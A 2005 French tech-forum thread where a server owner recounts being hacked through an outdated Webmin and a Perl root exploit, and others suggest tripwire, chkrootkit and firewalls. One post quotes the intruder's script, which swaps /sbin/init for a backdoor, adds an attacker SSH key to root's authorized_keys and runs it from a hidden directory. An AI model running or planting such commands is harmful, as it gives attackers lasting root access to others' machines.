Informaticien.be » Ouh le vilain pirate :o
Catégorie:  
Rappel du message précédent
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:16:14,
Par Poire
lol ! c pas tres malin de sa part au mec, il aurait peu l'installer sans couper tes serveurs, à la limite ce serait passé inapercu quelques jours.. mais en coupant tout, il est pas tres malin le gus!

:kiki:
:topicalacon:
Je défendrai mes opinions jusqu'à ma mort, mais je donnerai ma vie pour que vous puissiez défendre les vôtres. (Voltaire)
Photos


   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:17:18,
Par zion
il a pas réussi à installer son ssh custom en fait, du coup je suppose qu'il a eu un petit esprit de vengeance a essayer de tout couper :wink:

bon, sur ce, ca m'apprendra à laisser gcc et wget accessible à tout le monde aussi, je sais pas comment il a eu un accès shell (non root), mais je penche pour webmin, qui a dégagé de mon serveur :joce:

vilain hacker, mauvais hacker, pas de bobo, plus de peur que de mal, circulez y a rien à voir :sol:

:neowen:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:18:21,
Par ovh
C'est clair
Mais un serveur irc ça peut servir de moteur de recherche pour warez ou crack, c'est sans doute ça sa motivation ?
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:19:22,
Par Poire
t'as des src sur ton serveur ?
:topicalacon:
Je défendrai mes opinions jusqu'à ma mort, mais je donnerai ma vie pour que vous puissiez défendre les vôtres. (Voltaire)
Photos
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:26:30,
Par cauet
en fait c bien là le probleme du firewall software.. tu en aurait un de type hardware en amont il l'a bien profond pour mettre ces daemons à 2 balles..

a moins de hacker le tout, of course.
J'pense que je vais faire pareil, stopper webmin provisoirement, de toute manière, je ne m'en sert quazi pas.
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:35:42,
Par ovh
Ca n'a rien à voir avec le fait que le fw soit soft ou hard, ni qu'il soit en amont ou pas, ça n'aurait rien changé je pense.

Par contre, il existe un outil qui s'appelle tripwire, qui permet de vérifier qu'on ne substitue pas les binaires d'origine (il calcule une somme de contrôle et vérifie périodiquement).
http://www.tripwire.org
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:43:19,
Par zion
tripwire je l'ai installé y a qqs minutes, je l'avais pas en fait... sinon j'avais chkrootkit (excellent), et mon bon vieux ssh pour scanner fichier par fichier les différences... plus un gros urpmi bourrin pour tout remplacer, ca pulse bien :wink:

poire> oui, j'ai des sources, j'ai une collection de trucs :dawa:

mickael> J'ai pas de firewall, ca sert à rien dans mon cas, j'ai déjà fermé tout ce qui ne doit pas sortir, firewall ou pas, on rentrera par apache si il a une faille, je suis obligé de le laisser passer... :kiki:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:43:54,
Par zion
bon, par contre php a un soucis, il a pas envie d'envoyer un mail via postfix, du moins postfix en a pas envie... plus de notifications pour le moment

ca c'est pas pratique dis donc :oh:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 14:57:31,
Par Poire
:sol:
:topicalacon:
Je défendrai mes opinions jusqu'à ma mort, mais je donnerai ma vie pour que vous puissiez défendre les vôtres. (Voltaire)
Photos
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:11:47,
Par zion
bon, je continue l'enquête, j'ai trouvé un sniffer en plus du backdoor

il avait infecté /sbin/init, ca c'était le backdoor

puis y avait un sniffer qui loggait tout dans un fichier... ce que je ne comprends donc pas, c'est pourquoi ils ont tout bousillé alors, si ils voulaient me piquer des codes ou autre :kiki:

un morceau de la faille utilisée, c'est un exploit root de perl, maintenant je suppose qu'il y a en plus un deuxième exploit derrière avec webmin pour arriver à uploader dans mon /tmp, à y dézipper son script, le compiler et l'exécuter...

bon, apparemment y a un exploit d'execution dans webmin qui date du 22/12/2004, j'avoue, mon webmin date au moins du mois de novembre, je l'avais noté sur un papier à updater pour ce WE :kiki: (dingue)

bon, encore toujours le bug php à corriger et je vais pouvoir manger :kiki:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:17:43,
Par ovh
Je t'autorise à aller manger hein, tu verras pour le mail après :liplick:
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:18:19,
Par Poire
pk le perl est activé ? :outch:
:topicalacon:
Je défendrai mes opinions jusqu'à ma mort, mais je donnerai ma vie pour que vous puissiez défendre les vôtres. (Voltaire)
Photos
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:26:34,
Par zion
parce que spamassassin, webmin et pleins d'autres trucs ont besoin de perl :spamafote:

mais perl a été utilisé au travers d'un exploit webmin... donc il a utilisé webmin, puis un exploit perl pour foutre un backdoor + key logger... Par contre, il a eu apparemment du mal à se connecter en ssh, logique, root y a pas accès :joce:

Il a tenté de rajouter sa clé RSA:


echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys


:joce:

un morceau du script pour le plaisir:

chmod 0755 sk; if [ ! -f /sbin/init${H} ]; then cp -f /sbin/init /sbin/init${H}; fi; rm -f /sbin/init; cp sk /sbin/init
echo Your home is $D, go there and type ./sk to install
echo us into memory. Have fun!
mkdir -p /root/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
cd $FD
cd ..
rm -rf local local.tgz
/usr/share/locale/sk/.sk12/sk


il a uploadé un pack d'une dizaine d'exploits en fait, puis il a tout testé le con :oh:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:31:56,
Par cauet
Ca n'a rien à voir avec le fait que le fw soit soft ou hard, ni qu'il soit en amont ou pas, ça n'aurait rien changé je pense.

Par contre, il existe un outil qui s'appelle tripwire, qui permet de vérifier qu'on ne substitue pas les binaires d'origine (il calcule une somme de contrôle et vérifie périodiquement).
http://www.tripwire.org


Ben oui mais évidemment j'y avais pas pensé... mais fait aller ta jugeotte parfois ma poule..
comment il l'aurait fait aller son pti serveur irc, et son pti ssh perso si les ports étaient bloqués en entrées et qu'il n'ai aucun moyen des les ouvrir ? il l'aurait peut-etre mit sur le 80 ou le 25 ouvert, ca oui.

Seulement avec un iptable, il à vite fait de virer la conf en 2 minutes .. avec un firewall en amont, vas-y toujours à moins de hacker le firewall hardware..
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:36:06,
Par ovh
OK t'as pas tort, mais avec un serveur dédié tu n'as pas ça, tu n'as que ta machine à toi :fouyaya:
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:40:02,
Par zion
mickael> de fait, donc bon, un firewall soft, j'en vois pas l'utilité... suffit d'un bon outil de monitoring pour voir ce qu'il se passe, et en 2 ans, c'est la première fois que ca m'arrive, et par faute d'un upgrade oublié, pas vu ou inexistant :ohwell: (apparemment y en a pas encore si j'utilise urpmi, bien que je ne l'utilisais pas sur webmin).

quand je compare, ma machine a tenu vachement longtemps, je vais pas me plaindre, et vu qu'ils m'attaquent comme des bourrins depuis une semaine, les chances ne sont pas de mon côté.

Et quand je vois les multiples intrusions/dégats, il est fort probable qu'il y ait eu un concours sur ma tête :kiki:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:47:29,
Par ovh
Ben voilà t'es pas riche mais au moins t'es célèbre... :topicalacon:
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:48:47,
Par zion
ayé, tout est censé refonctionner les enfants... pfiouf

saloperie va :oh:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:50:35,
Par ovh
T'es un as zion :grinking:

On t'aime :zoubi:
Je n'ai rien à voir avec www.ovh.com
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:52:10,
Par zion
:roi:

:neowen:
Je suis le Roy :ocube:
   
Ouh le vilain pirate :o
Publié le 11/02/2005 @ 15:52:59,
Par cauet
Oui effectivement, c'est *pratiquement* impossible d'avoir un firewall hard en housing dans un datacentre..
a moins de louer un 3-4 unités et d'aller installer son propre matos. chez OVH ca se fait, tu peux louer 1U simplémentaire et automatiquement un accès electrique avec 300W je pense..

principal c'est que tout est revenu..

[JOKE] ca à du bon les bloquages de port de skynet, au moins on risque pas d'avoir un smtp relay installé sans notre plein gré (comme dirait virenque..)[/JOKE]
Répondre - Catégorie:  
Informaticien.be - © 2002-2024 AkretioSPRL  - Generated via Kelare
The Akretio Network: Akretio - Freedelity - KelCommerce - Votre publicité sur informaticien.be ?